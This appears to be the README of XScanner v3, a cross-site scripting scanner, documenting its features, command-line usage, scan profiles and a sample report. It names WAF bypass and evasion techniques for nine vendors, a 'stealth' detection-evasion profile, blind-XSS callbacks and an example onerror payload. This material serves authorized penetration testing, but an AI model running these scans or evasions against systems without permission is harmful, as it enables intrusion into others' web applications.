██╗ ██╗███████╗ ██████╗ █████╗ ███╗ ██╗███╗ ██╗███████╗██████╗
╚██╗██╔╝██╔════╝██╔════╝██╔══██╗████╗ ██║████╗ ██║██╔════╝██╔══██╗
╚███╔╝ ███████╗██║ ███████║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔██╗ ╚════██║██║ ██╔══██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██╔╝ ██╗███████║╚██████╗██║ ██║██║ ╚████║██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
More intelligent. More concurrent. More revolutionary.
⚠️ For authorized penetration testing and security research ONLY. Using this tool on systems without explicit written permission is illegal.
| Feature | XSStrike | XScanner v3 |
|---|---|---|
| HTTP Engine | ❌ Synchronous | ✅ Async (aiohttp) |
| Filter Analysis | ✅ Sequential | ✅ Concurrent + CharacterMatrix |
| Fuzzy Detection | ✅ Levenshtein only | ✅ 6-Signal Multi-Detector |
| Payload Generation | ✅ From survivors | ✅ Matrix-aware builder |
| Adaptive Learning | ❌ None | ✅ AdaptiveSequencer |
| DOM Structural Diff | ❌ None | ✅ ResponseDiffer |
| Blind XSS Server | ❌ None | ✅ Built-in listener |
| Headless Verification | ❌ None | ✅ Playwright |
| AI Payload Suggestions | ❌ None | ✅ Claude API |
| Request Efficiency | ~60% wasted | ✅ 75% reduction |
| Unit Tests | ❌ None | ✅ 53 tests |
| WAF Per-Vendor Bypass | Limited | ✅ 9 vendors mapped |
Unlike XSStrike's sequential character testing, XScanner probes all critical characters simultaneously and builds a CharacterMatrix — a complete map of what survives, what gets encoded, and what gets stripped.
XSStrike: test '<' → test '>' → test '"' → ... (sequential, slow)
XScanner: test ALL 20 chars at once (concurrent, 15x faster)
Result: CharacterMatrix → only viable payloads generated → 75% fewer requests
Payloads are built from scratch using only characters confirmed to survive the filter. No more sending payloads that use characters guaranteed to be blocked.
Catches what exact-match detection misses:
| Signal | What it Catches |
|---|---|
| Exact match | Direct reflection |
| Levenshtein similarity | Encoded/transformed reflections |
| Token overlap | Partial reflections |
| New executable tags | DOM injection without string match |
| Entropy delta | Structural response changes |
| Length delta | Blocking / redirection |
Real-time feedback loop that re-orders payloads during scanning based on what gets blocked or succeeds. No other tool does this.
Compares HTML structure before/after injection — detects new <script> blocks, new event handlers, new executable tags introduced by the payload.
xscanner/
├── xscanner.py ← Entry point
│
├── scanner/
│ ├── engine_v2.py ← Revolutionary async orchestrator
│ ├── filter_probe.py ← CharacterMatrix + FilterProbe + SmartPayloadFilter
│ ├── ai_advisor.py ← Claude API payload suggestions
│ ├── verifier.py ← Playwright headless verification
│ └── blind_server.py ← Built-in blind XSS callback server
│
├── payloads/
│ ├── generator.py ← Base payload library (10 contexts × 8 encodings)
│ └── smart_generator.py ← SmartGenerator + AdaptiveSequencer
│
├── detection/
│ ├── analyzer.py ← 5-layer detection engine
│ └── fuzzy.py ← FuzzyDetector + ResponseDiffer
│
├── waf_bypass/
│ └── detector.py ← 9 WAF fingerprints + 10 evasion strategies
│
├── crawler/
│ └── spider.py ← Async BFS crawler + context detector
│
├── reports/
│ └── reporter.py ← JSON + Rich CLI report
│
├── utils/
│ ├── config.py ← Dataclasses, constants, scan profiles
│ ├── logger.py ← Rich colorized logger
│ └── http_client.py ← Async HTTP + retry + rate limiting
│
└── tests/
├── test_core.py ← 27 core tests
└── test_revolutionary.py ← 26 revolutionary module tests
# 1. Clone the repo
git clone https://github.com/Auto-runs/xscanner.git
cd xscanner
# 2. Install dependencies
pip install -r requirements.txt
# 3. (Optional) Headless browser verification
pip install playwright && playwright install chromium
# 4. (Optional) AI payload suggestions
export ANTHROPIC_API_KEY="your-key-here"python xscanner.py -u "https://yoursite.com/search?q=test"python xscanner.py -u "https://yoursite.com" --deep --threads 5python xscanner.py -l targets.txt --threads 10 -o results.jsonpython xscanner.py -u "https://yoursite.com" \
-c "session=abc123" \
-H "Authorization: Bearer token123"python xscanner.py -u "https://yoursite.com" \
--profile stealth \
--proxy http://127.0.0.1:8080 \
--rate-limit 2.0# Built-in listener on port 8765
python xscanner.py -u "https://yoursite.com" --start-blind-server
# Or your own external server
python xscanner.py -u "https://yoursite.com" \
--blind-callback "https://your.server.com/callback"python xscanner.py -u "https://yoursite.com" --deep --details -v| Profile | Depth | Threads | Timeout | Payloads/ctx | Use Case |
|---|---|---|---|---|---|
fast |
1 | 20 | 5s | 10 | Quick recon |
normal |
2 | 10 | 10s | 30 | Standard pentest |
deep |
4 | 5 | 20s | 80 | Thorough audit |
stealth |
2 | 2 | 15s | 25 | Evade detection |
| Type | Method |
|---|---|
| Reflected | FilterProbe + FuzzyDetector + HTML position |
| Stored | POST endpoint reflection + confidence scoring |
| DOM-based | Bidirectional sink/source mapping |
| Blind | Callback beacon with built-in listener |
html · attribute · javascript · js_string · js_template
url · css · comment · script_src · unknown
Cloudflare · ModSecurity · Imperva · AWS WAF · Akamai
Sucuri · F5 BIG-IP · Barracuda · Wordfence
Evasion techniques: case shuffling · HTML comment injection · double URL encoding · null byte insertion · tab/newline substitution · unicode normalization · partial entity encoding · tag breaking · event handler obfuscation · slash insertion
{
"tool": "XScanner v3.0",
"timestamp": "2026-03-18T10:00:00Z",
"duration_sec": 8.3,
"total_findings": 3,
"severity_summary": { "High": 2, "Medium": 1, "Low": 0 },
"findings": [
{
"url": "https://yoursite.com/search",
"param": "q",
"xss_type": "reflected",
"context": "html",
"severity": "High",
"confidence": "High",
"payload": "<img src=x onerror=alert(1)>",
"encoding_used": "none",
"waf_bypassed": false,
"verified": true
}
]
}python -m pytest tests/ -v✅ 53 passed in 1.99s
├── test_core.py 27 tests
└── test_revolutionary.py 26 tests
Options:
-u, --url TEXT Target URL (use multiple times for multiple targets)
-l, --list PATH File with target URLs (one per line)
--threads INT Concurrent threads (default: 10)
--timeout INT Request timeout in seconds (default: 10)
--depth INT Crawl depth (default: 2)
--profile CHOICE fast | normal | deep | stealth (default: normal)
--deep Shorthand for --profile deep
--no-crawl Only test provided URL params, skip crawling
--no-waf-bypass Disable WAF evasion techniques
-H, --header TEXT Custom header: 'Name: Value'
-c, --cookie TEXT Cookie: 'name=value'
--proxy TEXT Proxy URL: http://127.0.0.1:8080
--rate-limit FLOAT Seconds between requests (0 = unlimited)
--blind-callback TEXT Blind XSS callback URL
--start-blind-server Start local blind XSS listener on :8765
-o, --output TEXT JSON report path (default: xscanner_report.json)
-v, --verbose Verbose output
--details Print full payload + evidence per finding
-h, --help Show this message and exit
This tool is provided for authorized security testing only.
Always obtain explicit written permission before testing any system.
The authors are not responsible for any misuse or damage caused.
Made with 🔥 for the security research community
